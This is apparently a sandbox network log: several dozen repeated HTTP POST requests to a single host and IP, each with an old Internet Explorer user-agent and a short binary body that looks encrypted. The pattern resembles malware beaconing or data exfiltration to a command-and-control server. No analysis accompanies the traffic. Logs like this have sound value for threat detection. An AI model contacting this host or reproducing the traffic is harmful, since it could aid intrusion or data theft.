OD\xde\xe0\xf1#Y\xf5v\xd5wM\xf6;\x83TTB\xd8\x19\x80\xe3\x12\xed/\xc5\xbb\x91\xdd]\xaep\x03\xea\x0b\x02\x1a\xb4i\x8e\x9f\xf8\xb1\xa4/y\x96\x95Z\x07\xa2\xf5\xe3\xf7\xd6T\xfc\xba\xde\xcey*\x0f\x8f>\xee\xb5/\xf2\xe6\xcc\xb6q\xde	\x1a\xf9H\xc4\x10\x0f7\xae\xa3\xaa\xd7uu\x9al\x8b\xdfq\xff\x08\xd9\x8ev\x9b\xf6\xbau\xb2\xfeEY1\xc4?\xba\xc0\x1aj\xf8yi\xa3\xba\xef\x80\xd5\xa8"Q\xe0HhJ\x16\xe6

http://ghanadetails.pw/1/file.php
  • Hostname: ghanadetails.pw
  • IP Address: 89.163.150.37
  • Port: 80
  • Count: 1

POST /1/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ghanadetails.pw
Content-Length: 142
Connection: Keep-Alive
Cache-Control: no-cache

\xf1WM+[~\xfa8A\x19n\xeb\xd1\x8f\xf5\
\x98OJUC\xe08\xd5\xb8\xc1\xe1\xc1\xcc\x062\xf3\xb7\xd6\x87\xfe\xa7\x84
\xe6z\xe6L.m\x93\xb8s\x0b\xdb3\xfc\xff\xdd<\xe6\x14-r\xa9wk\x01\x0es\xa8j\xd65\xe1\xf5\xc8\x9c\x9e2Pr<\x96\xd8c\xb7~\xf1\xf9	.\xee\x9f\x7f!\xe3\xe0.\x15\xfc\xa9\xc4\xf1\xdc\xe4\xdd\xff\xbeY\xe4\xae\xd4\xc2z\xde\xff\xee"\xf6\xae\xc2\xc5\x8d\xe3\x19\x94\xed$\x06\\x83\x7f\x11=_\x98\xee\xa9\xf28;\x7fp}Z

http://ghanadetails.pw/1/file.php
  • Hostname: ghanadetails.pw
  • IP Address: 89.163.150.37
  • Port: 80
  • Count: 1

POST /1/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ghanadetails.pw
Content-Length: 142
Connection: Keep-Alive
Cache-Control: no-cache

n\xb5\xe6\xb1\x16\x90\s\xf1ROcC\x80w-\\xda\x7f?\x81LRB\x8b=\xd7\xd9\x9fF\x0b\x91\xcf\xf6\xde\xbe\x10\xea\x81\xe5\xf5\x92dg\x1f\xc1\xb2j\x81\xeaH\xe5\x8bS\xcc\xe5\x1b2\x98\xe9T^\xc5\x01\x91\x91\x03\xf0\x9b\xdbG\xbex\xd7\xbf\xba\xc2}\xbe\xe7\x89!\x87\x0b%\xf6\xbbT\xb0\x1ai\x19\xbdj#\xb6\xc0\xe8\xcc\xc82\xa9\xd8\x17\xad\xb1f\x85\xe5n[\x0c
\x0f\xb1 \xd9n\xd4T\x1e?!v\xd9/\xf2\x83\xe0\xf3\x96\xc5\xd5\x00\x0f\xb9\x88p^\xf8\xefU

http://ghanadetails.pw/1/file.php
  • Hostname: ghanadetails.pw
  • IP Address: 89.163.150.37
  • Port: 80
  • Count: 1

POST /1/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ghanadetails.pw
Content-Length: 142
Connection: Keep-Alive
Cache-Control: no-cache

e%w}\xab\xed\xa8K\xa2n\xd7;\x1e&\x16DI1\x1d\xcfm\xed\xb4i\xf4ofO\xcbi\xc9\x8c\xd9{Ro\xb0\x8ah\xc0\xbb\xb3\xe1"_z\xce\x1e\x89\x1c7\x08z\xef7\xd3y}4b\x1dl\x1a\x01\x9a\x01\x92<&\xa6\xb3\x86+\xeb'\xe2\x9f\xdb\xdf\x8e\x9c\xca\xe5\xfb\xc9W]\x7f\xcfH\xd8\x8f\xe9E\xe1\xab\xd6e@\x19\x92\xc912\xe3\x90\xe3\xc0\xa5\xd5'x\x05\xf9\xce\xcd(\xd2/b|p\x8d\xfd\x90\x1d-\x83\xebc\x07	h}\xfb\x81\xdbL\xc6\xa0\xb2\xf3

http://ghanadetails.pw/1/file.php
  • Hostname: ghanadetails.pw
  • IP Address: 89.163.150.37
  • Port: 80
  • Count: 1

POST /1/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ghanadetails.pw
Content-Length: 145
Connection: Keep-Alive
Cache-Control: no-cache

b\xa8d\xd6\xed=\xec\x12\x85\xc4/\xcf\x86\x16\xf5\xfa4e\xb1\xb8\xd0rlt\x96\xefk\x8d\xb3G\x0b\xd8\x95\xbd
\x8f\xbd\x11g\xd2\xd7RR\x9d\xb8Yr\x7f\xf2\xdbYP\xcd\xd3>\x95\x8b\x19\x96D\x81\xa6<\xb1-<1'\xd0\xc6Go\xbc\xf1o\xa6\xb7[\x8c\x80Q.\xf9<\xc4x5\xd2\x1dxe\xfd!\xdb\x93O5\x0c\xb7V0\xfd\x91\x8f \xde\xff\xd0\xd9\x01 "\x9cI\x86^v\xae\x14\x9c\xfa\x14d\xdb\x0c\xd7\x0b3\^\xb4
\x86\x0f\x1d?\x1f\x0f\x9d\xef\x92z\x90\xd5&

http://ghanadetails.pw/1/file.php
  • Hostname: ghanadetails.pw
  • IP Address: 89.163.150.37
  • Port: 80
  • Count: 1

POST /1/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ghanadetails.pw
Content-Length: 145
Connection: Keep-Alive
Cache-Control: no-cache

t9\x84\x1cU\x97\x0b\xd2\xbf\xf2\x8f\x0b\x96\xc5ut
:k\x16b\xab\xfb\x97\x1aw\x84z\xf2\xe0z\x9d\xc6i\xaf\x00@\xfe\xc5W\xa8!\xb7\x1c\xed\xcf\xb7\xb4\x89\xc1\xc6\xbb:O\xec3B\xc4<\xf6\x85D\x08\xb1;\xad\xd1\xedhl\xa0\xaf\x86\xc7\xcfb\xa7\x88\x0c\x0eoq#\x92v\xa1\xa21\x91\xe0\x8a
`|\xe2
f\xd8\x12\xd9\xcd\x123
_\xad\x1aQ\x8c\x97\xe5\xe9\xe7S\x19\xb5\x812\xc6:3\xc9\xcei\x085?3J\xcfT\xc7>\xa5\xfa\xff%9=+\x82\xa9\x10[\x18

http://ghanadetails.pw/1/file.php
  • Hostname: ghanadetails.pw
  • IP Address: 89.163.150.37
  • Port: 80
  • Count: 1

POST /1/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ghanadetails.pw
Content-Length: 145
Connection: Keep-Alive
Cache-Control: no-cache

\x04\xdf\xce\x9b2\xfbX\xe4\xd2N2\x18\xb2G$yt\xcb\x9b\x91&\xf8\x14b\xc0bq\x17\xc68\xa8\x88\xa3\x9a\xf0\x922\x87\x83t\xd0\x88\x1f\x1a\xdcX\xf3\xac\xe2%#)k	\x16\xd3\x8d\xc4\xdc\x8e\xa4\x89\xcf\xb1KK\x9bj\x0f\x00\xf3\x99\xeb{rq\x83
]\x03\x11\x80\xd3\x152\xf2M\xc4K\xf5\x7fgT\xa40\x1f\x03+MK\xbfku)'\x04\xb2W\xbd\x00\xa1\xf1\x8c\xb7\xfc'\xd0t<\xda\xfc\xc9.\x11)\xf8\xf83:)\x1e@Y\xc9\xa9\xc9H\x85\x808\xa6+AVf

http://ghanadetails.pw/1/file.php
  • Hostname: ghanadetails.pw
  • IP Address: 89.163.150.37
  • Port: 80
  • Count: 1

POST /1/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ghanadetails.pw
Content-Length: 141
Connection: Keep-Alive
Cache-Control: no-cache

\x9c\xd1\x1fc\xf1S\x08|\x87v\xef\xb4\xab/D\x878W\xbb\xc4\x86\x948\x1e\xc9n^f\x98E\x9f\xdcs\xdci"\xb9g\x9b\xa4\xcd\xf8\x8a\xfe@V\x8b\xf0\xcb\xc0\x9ffB\xff\x83\xc2\x01_/\x90\x95\x9b\x97\x8a\xe8~q\xa9\xf7\x93\x98:\x85x\x94\xe6\xa1Y\x06\xc6f'\xc8{\xa9\xa5Z\x83y\xc2k-1\xe2<p\xf4J\xf3\xdc\x13\xacJ\xde\x1dS\x00\x94\xcb\x07\xae`\xafD\xb3\x1d\x1bs{\xcd\x9a\xaan\x0f\x18\xea\xa0\x08\x99\x1c\xfa\x9d\xb2E\x9c2x\xd9b\xaa\x8b

http://ghanadetails.pw/1/file.php
  • Hostname: ghanadetails.pw
  • IP Address: 89.163.150.37
  • Port: 80
  • Count: 1

POST /1/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ghanadetails.pw
Content-Length: 141
Connection: Keep-Alive
Cache-Control: no-cache

\xb5\xa7\x97%\xd4\x91\xfco81F\x9f\xc4\xad\xf8)\xe3eu\xc6\x1c\\xf5\x88\xe2\xa8\xb6\xe0w\xa3\xc2\xbd;\xcb\x80\x05\xfd\xc4\x0e\xd6\x13\xdeB\xb4N\xb5V?q\x930\x05\xb9V/5K\xf8\xa6w\x1b\x1c\xab\x8a\xc1\x08\xf9\xef\xd2Ql):?=\xcd\xce\xdb\xbah\xbd\x15\x06y3m\x97\x15R\x04\x83\xab\xde\x04a\x11\xbc]\x1a\xfbW\x0f\xdf\xac\xc3u\xc8\xde\xc5\xe4s\xaf\x15\x17\x1c~\xe0\xda\xd7:\xd0
\xe7\xe8\x96m\x9c\x08\xb0jr\xdb\x97\x87h!\xc7\x9e\xcb\x81\xe4

http://ghanadetails.pw/1/file.php
  • Hostname: ghanadetails.pw
  • IP Address: 89.163.150.37
  • Port: 80
  • Count: 1

POST /1/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ghanadetails.pw
Content-Length: 141
Connection: Keep-Alive
Cache-Control: no-cache

n\xf1\x16\xc7\xc3v`S\xf7+-\xd1x\x83\xcd\x98\xb3\xee\xe4d8\xccc\x9e\xa9\xc8\xd6\xab!3\xcd	T)\xb5S^\x97&^hp\x9dNF/\xd7:\x95\xac\x15\x13)r
\x97\xb4,r\x88\xf98\x10\x8a\x1a^x
\xc5\xb6\xf0\x15\xf5%V\x83r\xf5\x8f\xd9\xed\x9e\x97\xdb\x17\xfd\x01\x03\x19d\xe3\xe0\x88\x94n\xa5\xd3\xbf/\xad\xf4\\xf7$\xb8\xdb\x17$\xcd~\xf2\xaa\xf1(9hp\xfe\xf5\x98/\xd93\x17tI'\x08k<\xf39\x80`\xf4\x1d\x08\x84\xa0\xcfX

http://ghanadetails.pw/1/file.php
  • Hostname: ghanadetails.pw
  • IP Address: 89.163.150.37
  • Port: 80
  • Count: 1

POST /1/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ghanadetails.pw
Content-Length: 130
Connection: Keep-Alive
Cache-Control: no-cache

\x97+S\x07t\xf2\x87\x08v\x10S\xd3o\xeed}\x1e\xe4\xa5\xea\xf9i\xc3\x9c.^\x11	\x9b(\x1e[\xf0\xae\xad\xce\xb4N\x9cX\xb4\x16\xbe\x11\x9d\x87Z\x97;\x8a\xf4-\xb1V,\x0e\xd6
_}\x14t\x94\x8f\xe6\x818\xc8w7\x12Kq\x1b-\x84`\x9d#9E\x91\xd3P\xd3]\xa4\x04\x9b\xf7!G7\x8a\xb8\xf2}2=:\x14\x8fG(n\xb7>q\x8dD\x0c\x18\x0bu/\xb1\xf1\x1b\x15\xda\xff\x18\xa3\xe2\x8d\x16\xf3J\xce\x89

http://ghanadetails.pw/1/file.php
  • Hostname: ghanadetails.pw
  • IP Address: 89.163.150.37
  • Port: 80
  • Count: 1

POST /1/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ghanadetails.pw
Content-Length: 130
Connection: Keep-Alive
Cache-Control: no-cache

5\x1b\xc8\xb6\xee\xb5~\x0f\xed\xf9\xadc\x95\xd3[\x83\xc5\x7f&\xcb\xba\xae\xdd\x89\x01\x03\xdc>;\x99	\xeb\xe2.\x86\xcf\x9e\xb9\xd5\xef\x9fO\xf0\x11\xd7
\xd5\xd9P\xa1\xc7\xbcB!\x82\xabI\xe7"\xfa\x04u3\x8fD\xb1\xa3y\xedp\xebL\xea\xf2\xd34\x9a\xa0\x1c\xc7\x9e
Pq\x90\x9a\xba\x11\xb4\xaa\xecp\x97;\xafBo\xb2\x16;>x\x0e\x9fE\xeepq\xc7\xc9\x83V`^\x1c \x02l\xbb\x7f`\xf5\xdee\x9d\x17TJl\xb9

http://ghanadetails.pw/1/file.php
  • Hostname: ghanadetails.pw
  • IP Address: 89.163.150.37
  • Port: 80
  • Count: 1

POST /1/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ghanadetails.pw
Content-Length: 130
Connection: Keep-Alive
Cache-Control: no-cache

r}\x16W\xa5V\xff\xc25\xec^\xee\xd8p\xe9\x95S\x8eEO\xf3Uq\x93\xe6\x1b\xc7=\x95\xde\xbb\x9d\xd3>.X\xa3,"T1,u\xea\xec\xdf\x11\xb9\xb0&\xd2N}\xacX\xc7\xd8\x89O\x8f\xdcD\xf7\x8f\x03\xd7}\x98\xa6\x93j\x812\xe7 \xb9\xd7\x03\xae\xd1\x08\xfb3\xf5\xd9a\x16\x0bS\xb2\xf7s9|\x1d4^\xa2\xbe\xac\x03\xed\xf9$\xeb\x8d\xf5\x8a\xfc\x1cG6\x80\xd9	\xd2=\xe1a\x13\xf1\x9b\xb3\x10E&\x90J+\xdf

http://ghanadetails.pw/1/file.php
  • Hostname: ghanadetails.pw
  • IP Address: 89.163.150.37
  • Port: 80
  • Count: 1

POST /1/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ghanadetails.pw
Content-Length: 142
Connection: Keep-Alive
Cache-Control: no-cache

\x7f\xd1"4\x80\x97\xc4\x80\x8e.\xc8\x97u\xebxq\xf3\xd5e:m\x8d\x87\x0evg\x12\xb4\x85\x03[Y\x16Z\xd2\xf3N%\xd1\xdeB&+[\xe1bu\xfe\xe6-\x9a(\xafZ\xd1a.\xa0\x95L\x86\xd3]\x01\x80\xf5\xc7u
\xdc\xdfM\x07\xab8N\xf4\x16\xb1\xbb&.\x9d\x0e\xc97n\x18M@\xact\xa7/s~\x19D\xc0\x85lf\x88,\x1a\x05)\xb9\x1b\xcd\x9c\x98j\xc8c\xed\xfdg\xc9\xd0+\xad,\xd3\x0b\xa2j\x83\xf1\x97R@C\x07\x97J\xf7\x0c\xd9\x0c\xd9>

http://ghanadetails.pw/1/file.php
  • Hostname: ghanadetails.pw
  • IP Address: 89.163.150.37
  • Port: 80
  • Count: 1

POST /1/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ghanadetails.pw
Content-Length: 142
Connection: Keep-Alive
Cache-Control: no-cache

\xfe6
t\x13\xfd\xdd\xf6h\xdf\xd9\x1f\xa4\x9e6\x0c\xf5c\x15\xdb(\x00\xb4\xd9\xe5\xd9A\xb4\x08\xbc\xea\xe2,\x06A\x08f\xf4s\x13\x1fl\x81h\x8b\xac\x808[ QrQlY
\x06\xa5}\xf7\xb0\xd7W\x01\x01\x12\xef5\x9e\xb6\xc6;\xe1Z)\xc6%c\xff\xc6 \x98\xed\xef\x8c\xba]\xcf\xde\xfe\xfft*\x90\xc2\xc5#\x18S~D\xb7*\xe1GO\x83\x8aq\x03i^\xd7\xc5\xa8\xb7\x03QA\xbc\x03\xa8\xc4h=\xa6`\x83ppz\x00\xd0m\x8e<\x11\xfd\xc8\x84\x08K

http://ghanadetails.pw/1/file.php
  • Hostname: ghanadetails.pw
  • IP Address: 89.163.150.37
  • Port: 80
  • Count: 1

POST /1/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ghanadetails.pw
Content-Length: 142
Connection: Keep-Alive
Cache-Control: no-cache

\xaa\xd1B\x8b\xe8\xbe\x9c\xea\x9d\xbb\xc2\xb10\x83"\xb3]_j\x0c\x9e\x1e\xe5\xe6PK\xb2o\xd9\xcb\x04\xecv\xef\x07\xf9\x93\xb9<\x01\xe4\x06\x94\xc8\x11\xbf\x9a\x89\xfd\x12 \xab\xe9|\x06<\xbd9\x80"o\xae\xb7\x01U\xf5\xa7\xcae\xf5\x87'\x14>2h\xb1~\xeby\x88\xa4\x928:\xa4\x0c\xf0kl\x0c\xaf\xfb\xe7,\xcby\xf1\x15\x8f\xb1\xfae\xf3\xbc%\x96*\xeb\x10s\xefq\xf7\xd9n\xbbA\x1e\x8d\xb849\xbd\xe2\xdf\x80\x83$\x972\xff+.\xcf \xe4\x99\xd3*\x9cV

http://ghanadetails.pw/1/file.php
  • Hostname: ghanadetails.pw
  • IP Address: 89.163.150.37
  • Port: 80
  • Count: 1

POST /1/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ghanadetails.pw
Content-Length: 145
Connection: Keep-Alive
Cache-Control: no-cache

rI#\x85\xc31\x19\xb7
!\x9eD1W\xac\x93\xa9\x03C\xfd\x1b\xd3\x88\xad~\xfb\x93\x81\x1e\x13\xb2\xc8\x95L]\xcc\x83
\x82gH\xa7\xf3\x06\x1f\x08;\x06\x7f\xad\xbb\x05\x16b\xca\s\x1d~X<\xe2\x95\xb1=\xddvt\xfe\xca\xb2\xca3\x14\xde-\x00\x1a\xd5\xe9\xccH\x0by\x0f\xd9\xd1\x0b\xf5l\x9d\xf1\x8c\x8f*_5\xfd\xe0\x15\x0e\xe1t:\xbf+^K~Pi[\x11?d\x0b\xad\x1f\xe0U\x02\x10\x8c\xc7\xb1\x93\xa23L\xbf\xf3^\xa8\x03\xe8\x9a\x90\xea,d%;\xc9\xbc\xbb

http://ghanadetails.pw/1/file.php
  • Hostname: ghanadetails.pw
  • IP Address: 89.163.150.37
  • Port: 80
  • Count: 1

POST /1/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ghanadetails.pw
Content-Length: 145
Connection: Keep-Alive
Cache-Control: no-cache

\xb8\x97\x02\xd2yJ\xe1\xe6\xaa\x085i#|u\x88\x16\x9dZ`\xe7\xe8twshY\x04\x8e%XQ\xc6\x0b\xe5\x02\xa0\xef\xe3\xafq\x17\xc1\xb2\x94\xba{\x84Y\xaa;\x01s\xc0\xaf\x1f\xe7\x17-D5M\xe6\xb1\xf7\x03W#D\xb1J\x9b\x93=u\x00\x121\x0c\xf2s\xd6\x12\xe4\xf3\xe2-\xd1\xf8\xffWt\x1c\xb9\xc0\xc6f\xbaX\xdb-\x03\x15\xf2\x86\x9bl\xff\xf5\xe2)\xd978\xe4\x0f\xc8\xbd\x85\x16\x96\x1a\xdf\xdb\xb8<\xd13\x86a\xd2	\x12x\x10\xcb0\xc3\x87I7\x10\x10\xa7\x04

http://ghanadetails.pw/1/file.php
  • Hostname: ghanadetails.pw
  • IP Address: 89.163.150.37
  • Port: 80
  • Count: 1

POST /1/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ghanadetails.pw
Content-Length: 145
Connection: Keep-Alive
Cache-Control: no-cache

m\xca\xc3\xc8\x12;\xec\x8dC#	+e\xec\x9e1\x89\x97\xe1o\xc1\xe1\x91\x99\x80n\xaf\x12\x05\xede\xe8\xaa\xef\x9d\xa1r'W}!\x85DIk\x93)\x84\x7f\x199\xb7\xecp\xf3H\xad\xa8b\xeb\x07<b\xb1"^\x969/\xc0G\xf0z\x16IBT\xa1\xe7K\xec\xdc\xa9\xeb\xd5\xeb\xc8?\x0b\xf9\xa1b\x97q\xfd\x7f
^ x\xff\xcb\xa1 \xd6	\xe9\x04
\xcb{\xd9\x11\x8b\xe6\xb9W
\xd9A\xdc\xa5\x90t\x8aMU3S<\x13\x13y	\x1d\xa0\xd9\xe8\xbb\x0bq\x80\xfb\x1e\x9b

http://ghanadetails.pw/1/file.php
  • Hostname: ghanadetails.pw
  • IP Address: 89.163.150.37
  • Port: 80
  • Count: 1

POST /1/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ghanadetails.pw
Content-Length: 141
Connection: Keep-Alive
Cache-Control: no-cache

+\xc2\x80\xf0\xf5\x13C\x1e$\xf4u\xf3/\xea`xD\x17\xfc<y{HZ\x1f)v\xd7\xf7Gm\x11	\x02;|p\xea\x1d\x0b\xa3\xb7\xddt	^b\xc2zM\x15Sp\xdd>K\x1a\xd5\xca\xec7T\xa8\x8a_m\xee:\xf3\xd3\xd3X&\xfa\x0e\xa1%\x9c"9\x1ag\x8f\x83VJ*\xc7\xaf\x85C\x9c^\xe0\xce\xbd\x8e\x94\xa1\x82\xda!\xccqs\x1cW\x1e\x82\x0fGR\x1e\xc99()Q\xc6D\x81 \x8bs\xba%\x9f\x08.\x0fe\x0e\xb6\x05\xd7P\xdb[\xf8\xed\x0f

http://ghanadetails.pw/1/file.php
  • Hostname: ghanadetails.pw
  • IP Address: 89.163.150.37
  • Port: 80
  • Count: 1

POST /1/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ghanadetails.pw
Content-Length: 141
Connection: Keep-Alive
Cache-Control: no-cache

v\xe1X\x98#Xzd\xf6\x1f\xfe
\xcf|;"q&ef\xc4)\x89\x805\xba\xe6\xa3\xb90&\xf7\xb2\xc7\x05\xf2@G\xc2\x97\x97\xba\xb0k\x0f.\xdf~\xa9\x9aj\xef+i\x19w\xd6\xa0\xbc~\x9f\xc5\x05\x8a\x02N6R%\x98\xea"\xf4\x11\x85X\xc5
yc/V\x16\xd9\xeb\x18\xeb\x1d\x85\x16\xd3\xe8\x10\x97\x85[5Q\x9f\x0c\xea\x8c\x13\xedG\x11:\x01\x84\x7f\xfa\xee\xcd\x1eF\x94r\xe5\xe1xMU\xfd\xe1\x12\xb42\x08s,\xbdf`N\xee*	\xb0s\x14\xef

http://ghanadetails.pw/1/file.php
  • Hostname: ghanadetails.pw
  • IP Address: 89.163.150.37
  • Port: 80
  • Count: 1

POST /1/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ghanadetails.pw
Content-Length: 141
Connection: Keep-Alive
Cache-Control: no-cache

\x0bBu\x9aVB\xed\x16HJ\x9a\xe7\x055c\x03	O\xc6\xd0\xa1@7\x9c\xd9\xfb\xbe%\xe1o\xd1\xdb\xe3H\x04\xdc\x19qy\xc9\x05\xc3\xf8\xaa\xe9K\xabs\xfd\xdf\xe5ub,\x8bG\x16\xcd\xc8\xd4\xeb\xb6\xde\x8a\x7f\xed\x1bPP\x82}PJD\xe1\xb5\x0fC!BW?\xb5o\x8eqU\x01iW\x8bnH\xc8rwd\xde\x9e"\xb3\xba\xa8\xb3\xd5hr\xc0b\x1a\x8e\xe3\x99[\xc9\x0e;\xa0sH\x8d8\x89Kf\xc7\xe9\x08\x0e\x8f\x90d\x15TyX\xb7\xe5\x17\xf9%

http://ghanadetails.pw/1/file.php
  • Hostname: ghanadetails.pw
  • IP Address: 89.163.150.37
  • Port: 80
  • Count: 1

POST /1/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ghanadetails.pw
Content-Length: 130
Connection: Keep-Alive
Cache-Control: no-cache

\xa0{\xbf\x92\xe7\xd3\x06Js\x19h\xb3\x82\x8f\x96n\xee<\xc0\xc4\xdaq\x96\xbeD\xe8\xea;\x8e\xc5\xafs\xef\xd6is\x0fG52\x997\xadYX\xce\x80\xac\xe3z\xb9+\xbafQ\x04\x94\x94\x8cg)\xb1
\x8f\xd1\xd1\xd4]\xe4\x16\x93	t\x12\x16\xe4\x8d\xfc\xd1*\xb5I\xb6~\xf0E\xf1&\xf1A\xdau"g	\xdabJ\xf9\x87\xaf\x86\xeeBC\x96-9H
\xd6#\xd3\x85b\xb7\xfa+h\xd0\xbd\x86p\xf8\xb0\xd3jJ\xf9\xd9

http://ghanadetails.pw/1/file.php
  • Hostname: ghanadetails.pw
  • IP Address: 89.163.150.37
  • Port: 80
  • Count: 1

POST /1/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ghanadetails.pw
Content-Length: 130
Connection: Keep-Alive
Cache-Control: no-cache

\xb9\xbc}E*\x9f\x02\x8b\xab~u\x01\xae\x1a \xf8'\xe0(\x1c\xf8+9 /GQm\xde\x05\xa40\xb5R\xe8\xe7\x81Hr\xb0\x02\x13\xf3\xa87\x18uyi\xe5\x12\xb0\xdb\x7f\xbd\xd9\xbcxtr:2E\x8f\xc8\x16\x16\x8a)Z\x97\xc8\xacu\x0bV\xa1ig\xbc|\x95^\xa6\xd2\x1f^\xb8\x9a\xeea#r\xa7\x02\x998\xcex\x13!\x89\xa9\xc0\xd8\xb2s\xc8'\xdb#\xf6Y\x1a\xc9,\x9b2\x84
\x95j\x88\xed\xa3P"J\xe0\x1e

http://ghanadetails.pw/1/file.php
  • Hostname: ghanadetails.pw
  • IP Address: 89.163.150.37
  • Port: 80
  • Count: 1

POST /1/file.php HTTP/1.1
Accept: */*
